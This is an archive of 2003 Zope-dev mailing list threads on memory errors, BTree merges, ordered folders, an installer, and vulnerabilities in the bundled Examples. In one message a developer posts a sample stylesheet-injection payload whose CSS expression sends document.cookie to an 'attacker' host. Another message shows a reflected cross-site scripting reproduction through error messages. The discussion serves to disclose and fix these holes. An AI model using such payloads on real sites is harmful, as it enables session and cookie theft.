Re: [Zope-dev] Memory Error
There we go, occurred again. Its definitely the manipulating of catalog results, all the crashes are happening on zcatalog searches. There is over 530 Megs of Memory free at the time. But like I say its never occuring my other boxes so time to whip out some unit tests and the like ;) -- Andy McKay http://www.agmweb.ca ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
On Mon, 2003-06-23 at 09:20, Jamie Heilman wrote: I'll submit a fixed Examples.zexp but I need to know how its normally prepared, ownership, etc. Is there anything special I should do? No. Just go ahead and make the changes. It would be instructive for others reading the examples to add a comment or two explaining the rationale behind the extra checking code. The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present. seb ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
[Zope-dev] 2.6.2b3?
Just a quick repeat from last week in case it slipped from anyone's radar... Here is the important bit again: a) Any reason why I shouldn't merge BTree bugfixees into the 2.6 branch? b) If no, how about a 2.6.2b3? seb On Wed, 2003-06-18 at 17:25, seb bacon wrote: There lave been various BTree fixes lounging in the HEAD since Jan 2003 which I'd like to get into a release, basically because we have seen one of the bugs causing segfaults in production - this is the culprit: http://cvs.zope.org/Zope/lib/python/BTrees/BTreeItemsTemplate.c.diff?r1=1.17r2=1.18 a) Any reason why I shouldn't merge it into the 2.6 branch? b) Any chance of a 2.6.2b3? Seb ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] funky side-effects, possible bug in HTTPRequest.py
In article [EMAIL PROTECTED] you write: # Untrusted data *after* trusted data v = self.form.get(key, _marker) if v is not _marker: other[key] = v # *boom* return v That magical promotion of the key value to the other dictionary is what tripped me up. Wouldn't other.setdefault(key, v) be better? So a variable already existing in other wouldn't get clobbered. Florent -- Florent Guillaume, Nuxeo (Paris, France) +33 1 40 33 79 87 http://nuxeo.com mailto:[EMAIL PROTECTED] ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] 2.6.2b3?
Post this to zodb-dev. -Casey On Monday 23 June 2003 05:12 am, seb bacon wrote: Just a quick repeat from last week in case it slipped from anyone's radar... Here is the important bit again: a) Any reason why I shouldn't merge BTree bugfixees into the 2.6 branch? b) If no, how about a 2.6.2b3? seb On Wed, 2003-06-18 at 17:25, seb bacon wrote: There lave been various BTree fixes lounging in the HEAD since Jan 2003 which I'd like to get into a release, basically because we have seen one of the bugs causing segfaults in production - this is the culprit: http://cvs.zope.org/Zope/lib/python/BTrees/BTreeItemsTemplate.c.diff?r1=1.17r2=1.18 a) Any reason why I shouldn't merge it into the 2.6 branch? b) Any chance of a 2.6.2b3? Seb ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
I would be in favor of making the Examples opt-in like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it. -Casey On Monday 23 June 2003 05:12 am, Jamie Heilman wrote: seb bacon wrote: No. Just go ahead and make the changes. It would be instructive for others reading the examples to add a comment or two explaining the rationale behind the extra checking code. 'k I can do that The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present. You know, ironically, I don't think this advisory even covers that hole. There's obvious DoS potential in the guest book and such, but thats easily limited without degrading the value of the example. Anyway, I'll scrape over the examples and see what I can clean up. -- Jamie Heilman http://audible.transient.net/~jamie/ Most people wouldn't know music if it came up and bit them on the ass. -Frank Zappa ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope ) ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
RE: [Zope-dev] 2.6.2b3?
Tim says that this has been merged into the 2.6 branch (last week). Brian Lloyd[EMAIL PROTECTED] V.P. Engineering 540.361.1716 Zope Corporation http://www.zope.com -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of seb bacon Sent: Monday, June 23, 2003 4:13 AM To: [EMAIL PROTECTED] Subject: [Zope-dev] 2.6.2b3? Just a quick repeat from last week in case it slipped from anyone's radar... Here is the important bit again: a) Any reason why I shouldn't merge BTree bugfixees into the 2.6 branch? b) If no, how about a 2.6.2b3? seb On Wed, 2003-06-18 at 17:25, seb bacon wrote: There lave been various BTree fixes lounging in the HEAD since Jan 2003 which I'd like to get into a release, basically because we have seen one of the bugs causing segfaults in production - this is the culprit: http://cvs.zope.org/Zope/lib/python/BTrees/BTreeItemsTemplate.c.di ff?r1=1.17r2=1.18 a) Any reason why I shouldn't merge it into the 2.6 branch? b) Any chance of a 2.6.2b3? Seb ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope ) ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
[Zope-dev] Re: Ordered Folder again
Hi! Florent Guillaume wrote: But FWIW, note that in Nuxeo CPS we've always been using a monkey patch that added ordering to Folder without any problem. (http://cvs.nuxeo.org/cgi-bin/viewcvs.cgi/OrderedFolderSupportPatch/) CPS doesn't subclass from PortalFolder? If CPS would have its own class like PloneFolder in Plone, you could just mix in OrderSupport. But maybe CMFCore.PortalFolder should mix in OrderSupport? Would that help to solve your problem? Cheers, Yuppie ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
On Mon, 23 Jun 2003 01:20:35 -0700 Jamie Heilman [EMAIL PROTECTED] wrote: http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt [snip] apps, and apart from 1 and 3 there are probably legitimate bugs there. related issues: CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a, as far as the site permits to anonymous users or person without good references to write. To cope with the matter, I stupidly put multiple string substitution. t = re.sub(r'(?i)([^d]*iframe[^]*)',r'disabled \1',t) t = re.sub(r'(?i)([^d]*iframe[^]*)',r'disabled \1',t) t = re.sub(r'(?i)([^d]*iframe[^]*)',r'disabled \1',t) It would be appreciated if someone advices me more general and smart way. I know that Zope's StructuredText itself does not handle such a case, and that kind of implementaition may be left to each developer. If it had ability to avoid them, it would be much better, I think. Another example Following sample may allow malicious.css import from outside of the site. Put #1 or #2 to a StructuredText page. #1 LINK rel=stylesheet href=http://attacker/malicious.css; #2 STYLE type=text/css @import url('http://attacker/malicious.css'); /STYLE # expample of malicious.css http://attacker/malicious.css body { left: expression(eval( 'document.location=http://attacker/+document.cookie;')) } For example, make a 'Document' in a CMFDefault site, and put #1 to the reply form, DiscussionItem, against the original document, etc. It seems CMFDefault is vulnerable to this attack. Any general remedy for that kind of exploit? -- Kazuya Fukamachi ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
Andy McKay wrote: Casey Duncan wrote: I would be in favor of making the Examples opt-in like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it. +1 a simple How to add the examples to the ZODB at the top of the help would be good. Mind you I really dont want the HelpSys in my ZODB either :) Removing the help system could also appreciably boost startup time. I can't remember the last time I used the help system, yet it creates a ZCatalog for each Zope product. It would beneficial to allow users to disable it completely. Shane ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
[Zope-dev] Re: Ordered Folder again
On Mon, 2003-06-23 at 17:17, Yuppie wrote: Florent Guillaume wrote: But FWIW, note that in Nuxeo CPS we've always been using a monkey patch that added ordering to Folder without any problem. (http://cvs.nuxeo.org/cgi-bin/viewcvs.cgi/OrderedFolderSupportPatch/) CPS doesn't subclass from PortalFolder? If CPS would have its own class like PloneFolder in Plone, you could just mix in OrderSupport. We could, except that - we want to be useable with standard CMF objects - everybody wants ordering But maybe CMFCore.PortalFolder should mix in OrderSupport? Would that help to solve your problem? That's definitely a thing that would be useful, but I still stand by my proposal. Florent -- Florent Guillaume, Nuxeo (Paris, France) +33 1 40 33 79 87 http://nuxeo.com mailto:[EMAIL PROTECTED] ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
[Zope-dev] Re: Ordered Folder again
Hi Florent! Florent Guillaume wrote: CPS doesn't subclass from PortalFolder? If CPS would have its own class like PloneFolder in Plone, you could just mix in OrderSupport. We could, except that - we want to be useable with standard CMF objects Was just asking. I think you're doing the Right Thing. - everybody wants ordering Well, you want ordering, I want ordering, many other people want it. But maybe it's a special content management need. But maybe CMFCore.PortalFolder should mix in OrderSupport? Would that help to solve your problem? That's definitely a thing that would be useful, but I still stand by my proposal. Wish you good luck! I'm not very happy with the changes you propose, but if it helps to convince people ... Cheers, Yuppie ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
[Zope-dev] Re: weak examples, weak exploits
Casey Duncan wrote: I would be in favor of making the Examples opt-in like the Zope tutorial. It seems silly to have it in evey ZODB by default. Make people add it if they want it. Many, many moons ago I created evan-examples-branch, which allows individual Products to offer sample code without (magically or otherwise) forcing them upon the user. I'd love to see it revived, perhaps as Examples/Optional Extras in order to cover the Hurt system as well. The basic idea is to look for an XML manifest file 'examples/index.xml' in each Product. It probably wouldn't be very hard to use ZConfig instead of XML. Here is the PageTemplates index.xml: example name=Assorted Examples description This is a set of examples of the use of page templates. It includes examples of batching, macros, and trees. /description payload import file=zpt_examples.zexp/ /payload view url=zpt_examples/ /example !-- This file can contain any number of examples. Each one consists of an example with a 'name' attribute, containing exactly one description. The name and description are displayed in the Examples page. description can have a 'format' attribute set to 'plain' (the default), 'stx' (structured text), or 'html'. An example can contain payload elements. Each payload can contain any number of import, execute, and call elements. These are processed in order when an example is selected from the Examples page. import must have a 'file' attribute that names a file in the 'examples' directory to be imported. execute must have a 'file' attribute that names a file to be run with execfile. call must have a 'path' attribute that gives the path to a Zope object to be called. An example can contain at most one view element. The 'url' attribute of a view is the URL to view after all payload elements have been processed. This URL can be relative to the current folder. -- Cheers, Evan @ 4-am ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
[Zope-dev] zopeinstall, error in zope2.7 cvs
Hi, My first version of the zopeinstaller is available. It currently only build Python 2.2.3 and Zope 2.7, but I would like to enhance it to a full 'tinderbox'. See http://zwiki.org/PythonZopeTinderbox for details. It currently builds Python 2.2.3 from tarball and Zope 2.7 from CVS. It uses 'aap' to do so (http://www.a-a-p.org). For the first version of the main.aap of Zope, see http://gewis.nl/~pieterb/zope/zopeinstall/ I found one error in Zope2.7 CVS while working on the script. Zope doesn't seem to mind the http-port section in etc/zope.conf I changed the address, but the zopeserver started at port 8080 (default). This is my first installer/a-a-p-scripts, so please give feedback. Regards, PieterB -- http://zwiki.org/PieterB ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
seb bacon wrote: The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present. I opted for a patch that simply removes all the magic auto-install crud and goes for the installer link on the quick-start page. As for previous zope installations, well, I don't feel like trying to figure out how to examine the zodb and warn people if they've got bad examples still installed, it strikes me as too much junk in the startup procedure which is already too slow as it is. I say chalk it up as a lessoned learned and move on. As for my reworked examples, I added missing quoting to the navigation examples, size limits and entry limits to the guest book, size limits and entry limits to the file library, and additional sanity checking and robustness to just about everything. Examining the original advisory this is how I break it down: 1) moot with the addition of SiteErrorLog 2) Examples/db no longer exists in the Examples, I'm unaware if it ever did, at any rate, not a problem 3) moot with the addition of SiteErrorLog 3a) this is a problem, see below 3b) fixed in my reworking 3c) I was unable to reproduce this, maybe a bug with older Zopes? extra notes) wtf? I have no idea what the the advisory author was trying to say by including that diff, and I have feeling he doesn't know either. I mean, it has the words 'examples' and 'security' in it, but that doesn't make it relevant. There is unfortunately, a snag. One of the exploits (3a) as it turns out is actually a problem deeper down. To isolate a test case make a script like: ## Script (Python) aww_shit_now_what ##bind container=container ##bind context=context ##bind namespace= ##bind script=script ##bind subpath=traverse_subpath ##parameters=i ##title= ## return int(i) Then call it http://host/aww_shit_now_what=bold+flava' This can be disarmed by ensuring that in your standard_error_message you quote the results of error_msg, however this isn't the default, and it will result in a lot of broken and ugly looking (albeit safer) error pages. I haven't fully figured out exactly whats going on with that whole thing yet. I have a feeling its atributable to either raise_standardErrorMessage's smart tag searching, or some other auto-magical aspect of the error handling framework. (clues appreciated) In the mean time I suggest quoting error_msg. -- Jamie Heilman http://audible.transient.net/~jamie/ ...thats the metaphorical equivalent of flopping your wedding tackle into a lion's mouth and flicking his lovespuds with a wet towel, pure insanity... -Rimmer ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] weak examples, weak exploits
Jamie Heilman wrote: Then call it http://host/aww_shit_now_what=bold+flava' er, http://host/aww_shit_now_what?i=bold+flava' rather. -- Jamie Heilman http://audible.transient.net/~jamie/ Paranoia is a disease unto itself, and may I add, the person standing next to you may not be who they appear to be, so take precaution. -Sathington Willoughby ___ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )